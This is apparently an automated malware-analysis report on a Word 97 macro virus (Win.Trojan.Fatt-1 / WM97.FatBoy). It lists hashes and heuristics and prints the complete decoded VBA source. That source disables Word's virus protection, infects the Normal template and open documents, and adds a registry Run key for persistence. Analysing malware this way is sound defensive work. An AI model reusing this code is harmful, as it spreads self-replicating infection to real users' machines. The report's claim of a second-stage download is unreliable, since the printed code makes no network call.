Win.Trojan.Fatt-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 e7eee22eb12c8f4a…

MALICIOUS

Office (OLE)

36.5 KB Created: 1997-10-02 10:21:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 18afacf3d11fe8b4e300392839a1a7c2 SHA-1: 6ad99995b0cdd8fbca349b99a7567ebb9b05a99e SHA-256: e7eee22eb12c8f4ae6f5fa5c76798f5f3d1ad979c7a85e90cf6c6a57a452c43d
228 Risk Score

Malware Insights

Win.Trojan.Fatt-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for malicious Office documents. The script attempts to write a file named 'Msfat.sys' and a VBScript 'Msfat.sys.vbs' to the system directory. It also creates a registry Run key pointing to the VBScript, indicating an attempt to establish persistence and download a second-stage payload.

Heuristics 5

  • ClamAV: Win.Trojan.Fatt-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Fatt-1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Open "C:\WINDOWS\SYSTEM\Msfat.sys.vbs" For Output As #1
       Print #1, "Set fatty = WScript.CreateObject(""Word.Application"")"
       Print #1, "fatty.Options.VirusProtection = 0"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
     On Error Resume Next

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2847 bytes
SHA-256: f18c6dbd406e26dfb10325d1de612a4fab877886c9cbad2908c9eab7493613aa
Detection
ClamAV: Doc.Trojan.Fatt-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FatBoy"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
 On Error Resume Next
  Const a = "FatBoy"
  Const b = "c:\WINDOWS\SYSTEM\Msfat.sys"
  Set Code = New DataObject
  With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: .ConfirmConversions = 0: End With
    Code.SetText FatBoy.VBProject.VBComponents(1).CodeModule.Lines(1, FatBoy.VBProject.VBComponents(1).CodeModule.CountOfLines)
    Open b For Output As #1: Print #1, Code.GetText: Close #1
    If ActiveDocument.VBProject.VBComponents(1).Name <> a Then
      Set fatt = ActiveDocument.VBProject.VBComponents(1)
      saveme = True
     ElseIf NormalTemplate.VBProject.VBComponents(1).Name <> a Then
      Set fatt = NormalTemplate.VBProject.VBComponents(1)
      repla = True
    End If
    If fatt.CodeModule.CountOfLines > 0 Then fatt.CodeModule.DeleteLines 1, fatt.CodeModule.CountOfLines
      fatt.CodeModule.AddFromFile b
      fatt.Name = a
    If saveme = True Then
     ActiveDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 26, "Sub stealth()"
     ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    ElseIf repla = True Then
     NormalTemplate.VBProject.VBComponents(1).CodeModule.ReplaceLine 26, "Sub ViewVBCode()"
    End If
End Sub
Sub stealth()
  System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "") = "C:\WINDOWS\SYSTEM\Msfat.sys.vbs"
  Open "C:\WINDOWS\SYSTEM\Msfat.sys.vbs" For Output As #1
   Print #1, "Set fatty = WScript.CreateObject(""Word.Application"")"
   Print #1, "fatty.Options.VirusProtection = 0"
   Print #1, "fatty.Options.SaveNormalPrompt = 0"
   Print #1, "Set fatt = fatty.NormalTemplate.VBProject.VBComponents(1)"
   Print #1, "If fatt.Name <> ""FatBoy"" then"
   Print #1, "fatt.CodeModule.DeleteLines 1, fatt.codemodule.CountOfLines"
   Print #1, "fatt.CodeModule.AddFromFile (""C:\WINDOWS\SYSTEM\Msfat.sys"")"
   Print #1, "fatt.name = ""FatBoy"""
   Print #1, "end if"
  Close #1
 If ActiveDocument.VBProject.VBComponents(1).Name = "FatBoy" Then
      ActiveDocument.VBProject.VBComponents(1).Name = "ThisDocument"
      ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
 End If
 If NormalTemplate.VBProject.VBComponents(1).Name = "FatBoy" Then
      NormalTemplate.VBProject.VBComponents(1).Name = "ThisDocument"
      NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
 End If
End Sub
' WM97.FatBoy - Psyclone X